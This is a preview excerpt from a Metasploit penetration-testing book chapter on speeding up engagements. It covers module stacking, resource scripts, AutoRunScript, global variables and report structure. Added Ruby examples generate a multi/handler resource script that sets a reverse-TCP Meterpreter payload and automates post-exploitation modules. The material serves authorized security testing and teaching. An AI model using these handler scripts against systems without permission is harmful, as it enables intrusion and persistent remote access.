You're reading from Metasploit Bootcamp

Product type: Book
Published in: May 2017
ISBN-13: 9781788297134
Edition: 1st Edition

Author: Nipun Jaswal

Nipun Jaswal is an international cybersecurity author and an award-winning IT security researcher with more than a decade of experience in penetration testing, Red Team assessments, vulnerability research, RF, and wireless hacking. He is presently the Director of Cybersecurity Practices at BDO India. Nipun has trained and worked with multiple law enforcement agencies on vulnerability research and exploit development. He has also authored numerous articles and exploits that can be found on popular security databases, such as PacketStorm and exploit-db. Please feel free to contact him at @nipunjaswal.

Chapter 6. Fast-Paced Exploitation with Metasploit

While performing a penetration test, it is crucial to keep an eye on time constraints. A penetration test that consumes more time than expected can lead to a loss of faith, costs that exceed the budget, and many other problems. A lengthy penetration test might also cause an organization to lose all of its future business from the client.

In this chapter, we will develop methodologies to conduct fast-paced penetration testing with automation tools and approaches in Metasploit. We will learn about the following:

  • Switching modules on the fly
  • Automating post-exploitation
  • Automating exploitation

This automation strategy will not only decrease the time taken by testing, but will also decrease the cost per person-hour.

Using pushm and popm commands


Metasploit offers two useful commands, pushm and popm. The pushm command pushes the current module onto the module stack, while popm pops the most recently pushed module off the top of the module stack. This stack is not the process stack available to running programs; Metasploit simply reuses the stack concept to keep track of loaded modules, and the two are otherwise unrelated. Using these commands lets us switch modules quickly, which saves a lot of time and effort.

Consider a scenario where we are testing an internal server with multiple vulnerabilities. We have two exploitable services running on every system on the internal network. To exploit both the services on every machine, we require a fast switching mechanism between modules for both the vulnerabilities. In such cases, we can use pushm and popm commands. We can test a server for a single vulnerability using a module and can then push the module on the stack and load the other module. After completing tasks with the second module,...

Making use of resource scripts


Metasploit offers automation through resource scripts. The resource scripts eliminate the need to set the options manually, setting up everything automatically, thereby saving the large amount of time needed to set up the payload and the module's options.

There are two ways to create a resource script: write it manually, or use the makerc command. I recommend the makerc command over manual scripting since it eliminates typing errors. The makerc command saves all the previously issued commands in a file, which can then be replayed with the resource command. Let us see an example:

We can see in the preceding screenshot that we launched an exploit handler module by setting up its associated payload and options such as LHOST and LPORT. Issuing the makerc command will save all these commands in a systematic way into a file of our choice, which in this case is multi_hand. We can see that makerc successfully saved the last six commands into the multi_hand...

Using AutoRunScript in Metasploit


Another useful Metasploit feature is AutoRunScript. The AutoRunScript option is listed when you issue the show advanced command. It automates post-exploitation: whatever it names is executed as soon as access to the target has been achieved. We can set the AutoRunScript option manually by issuing set AutoRunScript [script-name], or set it from the resource script itself, which then automates exploitation and post-exploitation together. AutoRunScript can also run more than one post-exploitation script by using the multi_script and multi_console_command modules. Let us take an example where we have two scripts, one for automating the exploitation and the second for automating the post-exploitation, as shown in the following screenshot:

This is a small post-exploitation script that automates the checkvm (a module to check whether the target is running on a virtual environment) and migrate (a module that helps in migrating from the exploited process...
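The two files the resource script section and the AutoRunScript section describe, as an added Ruby example that is not code from the book or from Metasploit: a post-exploitation command file for multi_console_command (checkvm and migrate), and a handler resource script of the kind makerc captured into multi_hand, whose AutoRunScript line points at that file. Before the script is handed to the resource command, a small checker looks for the mistakes that manual scripting tends to introduce (a set before any use, an LHOST that is not an address, an out-of-range port, a multi_console_command line with no -rc or -cl). The list of accepted console commands, the sample addresses and the file names are assumptions of this example; the post module paths are the current locations of checkvm and migrate and should be confirmed with search on your own install.

```ruby
require 'ipaddr'
require 'tmpdir'

# Added example, not code from the book or from Metasploit. Builds the
# post-exploitation command file and the handler resource script the
# chapter describes, then sanity-checks the script before `resource` runs it.

# Console commands this checker accepts in a resource script (a subset chosen
# for this example; msfconsole itself knows many more).
ALLOWED_COMMANDS = %w[use set setg unset unsetg run exploit resource sleep].freeze

# Post-exploitation commands named in the section, as multi_console_command
# reads them from a file passed with -rc. Confirm the module paths with `search`.
POST_COMMANDS = [
  'run post/windows/gather/checkvm',
  'run post/windows/manage/migrate'
].freeze

# Literal IPv4/IPv6 only; interface names such as eth0 are not accepted here.
def valid_ip?(value)
  IPAddr.new(value)
  true
rescue ArgumentError
  false
end

class ResourceScript
  attr_reader :lines

  def initialize
    @lines = []
  end

  def add(line)
    @lines << line.strip
    self
  end

  def to_s
    lines.join("\n") + "\n"
  end

  # Returns an array of problems; an empty array means the script looks sane.
  def validate
    problems = []
    module_loaded = false
    lines.each_with_index do |line, idx|
      next if line.empty? || line.start_with?('#')
      cmd, *args = line.split
      n = idx + 1
      problems << "line #{n}: unknown command '#{cmd}'" unless ALLOWED_COMMANDS.include?(cmd)
      module_loaded = true if cmd == 'use'
      problems << "line #{n}: 'set' before any 'use'" if cmd == 'set' && !module_loaded
      next unless %w[set setg].include?(cmd)
      key = args[0].to_s.upcase
      value = args[1..-1].join(' ')
      case key
      when 'LHOST', 'RHOST'
        problems << "line #{n}: #{key} '#{value}' is not an IP address" unless valid_ip?(value)
      when 'LPORT', 'RPORT'
        ok = value =~ /\A\d+\z/ && (1..65_535).cover?(value.to_i)
        problems << "line #{n}: #{key} '#{value}' is not a valid port" unless ok
      when 'AUTORUNSCRIPT'
        if value.start_with?('multi_console_command') && value !~ /\s-(rc|cl)\s/
          problems << "line #{n}: multi_console_command needs -rc <file> or -cl <list>"
        end
      end
    end
    problems
  end
end

# A handler setup of the kind makerc captures; six commands when post_rc is given.
def build_handler_script(payload:, lhost:, lport:, post_rc: nil)
  rc = ResourceScript.new
  rc.add('use exploit/multi/handler')
    .add("set payload #{payload}")
    .add("set LHOST #{lhost}")
    .add("set LPORT #{lport}")
  rc.add("set AutoRunScript multi_console_command -rc #{post_rc}") if post_rc
  rc.add('exploit -j')
end

# Writes post_cmds.rc and multi_hand.rc into dir; returns both paths.
def write_bundle(dir, payload:, lhost:, lport:)
  post_path = File.join(dir, 'post_cmds.rc')
  File.write(post_path, POST_COMMANDS.join("\n") + "\n")
  rc = build_handler_script(payload: payload, lhost: lhost, lport: lport, post_rc: post_path)
  main_path = File.join(dir, 'multi_hand.rc')
  File.write(main_path, rc.to_s)
  [main_path, post_path]
end

if __FILE__ == $PROGRAM_NAME
  # Constructed sample values for the demo.
  Dir.mktmpdir do |dir|
    main, = write_bundle(dir, payload: 'windows/meterpreter/reverse_tcp',
                              lhost: '192.168.10.105', lport: 4444)
    script = ResourceScript.new
    File.read(main).each_line { |l| script.add(l) }
    puts script
    puts "problems: #{script.validate.inspect}"
  end
end
```

The generated multi_hand.rc is then loaded with resource multi_hand.rc (or passed to msfconsole -r), and the handler sets up its payload, listener and AutoRunScript in one step; the checker runs on the text only and never talks to the framework, so it can be used in a pre-engagement review of scripts written by hand.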

Global variables in Metasploit


When working on a particular range or a specific host, we can use the setg command to specify the LHOST and RHOST options. Setting an option with setg sets RHOST or LHOST globally, for every module loaded. Hence, the setg command eliminates the need to set these options repeatedly. We can also use setg for other options, such as LPORT, RPORT, and payload. However, different services run on different ports, and we may need to alter the payloads as well. Hence, it is better to use setg only for options that do not change from one module to another. Let us have a look at the following example:

We assigned RHOST with the setg command in the preceding screenshot. We can see that no matter how many times we change the module, the value of RHOST remains constant for all modules, and we do not need to enter it manually in every module. The get command fetches the value of a variable from the current...
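The resolution order behind the setg example above, as an added Ruby model that is not Metasploit's own code: each loaded module gets its own datastore, a lookup tries that datastore first and falls back to the global one, so a setg value survives every module switch while a plain set overrides it only inside the module where it was issued. The module names and the RHOST values in the walkthrough are constructed for the demo.

```ruby
# Added example, not Metasploit's own code: a small model of how an option is
# resolved after setg (global) and set (module-local) have both been used.
class Datastore
  def initialize(parent = nil)
    @values = {}
    @parent = parent # the global datastore, or nil for the global one itself
  end

  # Option names are case-insensitive in msfconsole, so normalise the key.
  def set(key, value)
    @values[key.to_s.upcase] = value
  end

  def unset(key)
    @values.delete(key.to_s.upcase)
  end

  # Local value first, then whatever the parent (global) datastore holds.
  def get(key)
    k = key.to_s.upcase
    return @values[k] if @values.key?(k)
    @parent&.get(k)
  end
end

# The handful of console commands the section uses.
class Console
  def initialize
    @globals = Datastore.new
    @current = nil
  end

  # Each `use` creates a fresh module datastore that inherits from the globals.
  def use(module_name)
    @module_name = module_name
    @current = Datastore.new(@globals)
  end

  def setg(key, value)
    @globals.set(key, value)
  end

  def unsetg(key)
    @globals.unset(key)
  end

  def set(key, value)
    raise 'no module loaded' unless @current
    @current.set(key, value)
  end

  def unset(key)
    @current&.unset(key)
  end

  def get(key)
    (@current || @globals).get(key)
  end
end

# Walks through the section's scenario: one setg, several module switches,
# one local override. Module names and addresses are constructed for the demo.
def setg_walkthrough
  c = Console.new
  c.setg('RHOST', '192.168.10.112')
  trace = {}
  c.use('auxiliary/scanner/portscan/tcp')
  trace[:scanner] = c.get('rhost')          # global value; lowercase lookup works
  c.use('exploit/multi/handler')
  trace[:after_switch] = c.get('RHOST')     # still the global value
  c.set('RHOST', '10.0.0.5')
  trace[:local_override] = c.get('RHOST')   # local set wins over setg
  c.use('auxiliary/scanner/portscan/tcp')
  trace[:switched_again] = c.get('RHOST')   # override was per module; global again
  c.unsetg('RHOST')
  trace[:after_unsetg] = c.get('RHOST')     # nothing left to fall back on
  trace
end

if __FILE__ == $PROGRAM_NAME
  setg_walkthrough.each { |step, value| puts "#{step}: #{value.inspect}" }
end
```

The practical consequence is the one the section warns about: a global LPORT or payload is silently inherited by every module you load next, so keep setg for values that really are constant across the engagement and check with get before running a module whose defaults matter.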

Wrapping up and generating manual reports


Let us now discuss how to create a penetration test report and see what is to be included, where it should be included, what should be added or removed, how to format the report, the usage of graphs, and so on. Many people, such as managers, administrators, and top executives, will read the report of a penetration test. Therefore, it's necessary for the findings to be well organized so that the correct message is conveyed to those involved and is understood by the target audience.

The format of the report

A good penetration testing report can be broken down into the following elements:

  • Page design
  • Document control
  • Cover page
  • Document properties
  • List of the report's contents
  • Table of contents
  • List of illustrations
  • Executive/high-level summary
  • Scope of the penetration test
  • Severity information
  • Objectives
  • Assumptions
  • Summary of vulnerabilities
  • Vulnerability distribution chart
  • Summary of recommendations
  • Methodology/technical report
  • Test details
  • List of vulnerabilities
  • Likelihood...

Summary and preparation for real-world scenarios


This chapter allowed us to work on speeding up the process of a penetration test by automating exploitation and post-exploitation using multiple types of resource scripts. We also saw the usage and benefits of pushm, popm, and variable globalization. By the end, we saw how we could design professional reports and how the various sections of the report are to be rendered.

Before we begin Chapter 7, Exploiting Real-World Challenges with Metasploit, it is advised that you run through all the examples covered in the book so far and learn each and every method covered in detail. However, no book will help you hone your skills unless you practice each and every thing while enhancing your research capabilities.

We will make use of each and every technique learned in the previous chapters to solve the challenges in the next one, while learning some new technologies. You can practice the following exercises before reading through Chapter 7, Exploiting...
